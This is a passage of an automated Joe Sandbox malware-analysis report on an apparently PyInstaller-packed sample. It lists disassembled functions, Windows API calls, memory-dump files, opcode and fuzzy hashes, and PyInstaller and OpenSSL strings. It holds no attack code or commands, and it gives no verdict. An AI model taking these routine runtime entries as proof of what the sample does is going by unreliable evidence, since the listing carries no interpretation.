                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF7EAD06476,?,00007FF7EAD0336E), ref: 00007FF7EAD08EA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                              • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                              • Instruction ID: 0cd5ea4a23c9f484ed908a5932d86f5b3d9d597a6a239652499352a9af5477e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5D08C11B2424542FA48F777BA467699252AB89BC0F88C076EE1D03B4EDC3CC0418B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF7EAD10C90,?,?,?,00007FF7EAD122FA,?,?,?,?,?,00007FF7EAD13AE9), ref: 00007FF7EAD1D63A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction ID: 4e75942390d74251708174c86bbe5854b8d2a36d7cea8b24552fb5be8cf2454a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF0D450B0924A45FE65B7B158417759394DFA4BA0FC806B2D9BE862CADF3CA4808672
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction ID: 235a67f0b1412dbbdebda2e637d2da7591839ba84bc1f88a3a8e8885d7006363
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81D19432A08A8286F710EF34E8943ADB765FF94B58F800276DA5D43A98DF7CD154C721
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F874
                                                                                                                                                                                                                              • String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
                                                                                                                                                                                                                              • API String ID: 3612976672-4109427827
                                                                                                                                                                                                                              • Opcode ID: 3a8733b9f8724a0ad4dac92debb2868cdbdf7ad001dd02e936b03acc83697b27
                                                                                                                                                                                                                              • Instruction ID: 3a55ef73a50a13c22e00d4146dfa27396ee97a9ceb6d9244052f6d6866c94d08
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a8733b9f8724a0ad4dac92debb2868cdbdf7ad001dd02e936b03acc83697b27
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F15E32A0DA8286FE658BA1A85833D67A1BF85BC1F48C435DA5E467D0DF3CF514C70A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
• Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmp
• Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
Similarity
• API ID: 00007ExceptionF8751FilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 1180211362-0
• Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
• Instruction ID: f9e3a05f61c57739c4702db93db31246234c44cb14f5f8f2e9271ba6b912f26f
• Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
• Instruction Fuzzy Hash: A2312AB2608B8286EB60AFA1E8443AD6371FB84784F40413ADA6E47B99DF3CD548C711
APIs
• FindFirstFileW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD0842B
• RemoveDirectoryW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084AE
• DeleteFileW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084CD
• FindNextFileW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084DB
• FindClose.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084EC
• RemoveDirectoryW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084F5
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
• Instruction ID: 583ef5b254f7ff1f7114440e18d99883d7db02a05b27b2c37a6eead3137a212d
• Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
• Instruction Fuzzy Hash: B4414121A0CA8285FA20EB24E4843BEB362FB94758FC00273D59D4269CEF7CE555C762
APIs
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
• Instruction ID: 2cf2ed9a7c7ec29d25f1bad7313fc5ab5e79b5ddf4c6a3d30a84afb0d25fa96b
• Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
• Instruction Fuzzy Hash: D4313C76709A8186EB608FA1E8417ED73A0FB88788F44403ADB5E47B95DF3CD548C701
APIs
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 8bb2c844973f8a307a2fb197422134c0be9fa62acd3dd33c558e307c9d71f774
• Instruction ID: 02c638f09594fe8918723b3a1d5a2ff0e0f5692a82cc834209b0834f5e796133
• Opcode Fuzzy Hash: 8bb2c844973f8a307a2fb197422134c0be9fa62acd3dd33c558e307c9d71f774
• Instruction Fuzzy Hash: 54315E72609B8186EB609FA0E8803ED7374FB85B88F05443ADA4E57B94DF3CD548C709
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction ID: 7690faec4d4eb51db33b0a18cf866503fa47c1b85a6e53cf763e3c4af380cf83
• Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction Fuzzy Hash: 4E311072608B818AEB60DF60E8803ED7365FB94748F44407BDA4D47B98DF78D548C721
APIs
Memory Dump Source
• Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
• Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 8e86fcbda8d44a87da12ad3cbe0ff2274eff02410a8037cee209cf92a2e866f6
• Instruction ID: 6a130a50800aead81d05da99c36de12e3ede94f30fa31d23e5b546feae89f4f5
• Opcode Fuzzy Hash: 8e86fcbda8d44a87da12ad3cbe0ff2274eff02410a8037cee209cf92a2e866f6
• Instruction Fuzzy Hash: 28311A72609B818AEB60CFA0E8407ED7365FB84794F44843ADA4E47B94EF3CD548C719
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 6b94263228284adea3e7e1cdca652a094aa349ee7aad73e387e1651aa79022c0
                                                                                                                                                                                                                              • Instruction ID: ebbcb5b168c0d5bea8521b5041411b2cd34b83ff4e8ddfa9e4094ce9ef007743
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b94263228284adea3e7e1cdca652a094aa349ee7aad73e387e1651aa79022c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6311A72609B8187EB609FA0E8503EE7764FB84794F44803ADA4E47BD9DF3CD6488B15
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25C45
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD25598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255AC
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: HeapFree.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7EAD1A8DF,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1A909
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7EAD1A8DF,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1A92E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25C34
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD2560C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EAA
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EBB
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25ECC
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7EAD2610C), ref: 00007FF7EAD25EF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                              • Instruction ID: feef039ee7deb00c37f8ee75818b46884c4f7fb5df07af97e66af3a7906f4d7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D1AE26A0824246F720FF25D881BB9A761EF94794FC481B7EA0D47699EE3CE441C772
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction ID: 0de5e91adda5b643549efd4550c29c5ef072a380bc9a6c5675796fb433ce32cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A318236608F8185EB20DF24E8403AEB3A4FB94758F900136EA9D43B69DF3CD145CB11
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                              • API String ID: 0-1194634662
                                                                                                                                                                                                                              • Opcode ID: c94791f86e3c1c1323ec9f109cc887bfa88f100ec66f8452c83b76583b23fb71
                                                                                                                                                                                                                              • Instruction ID: 4b800031aa28aee72afbba43f41a439ea7137ee62c2e11955d0da1d16025092e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c94791f86e3c1c1323ec9f109cc887bfa88f100ec66f8452c83b76583b23fb71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5D1AF22B1D68281FB509BA5E8427FD6790EB85BC8F544036EE6C4B79ACF3DE541C312
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
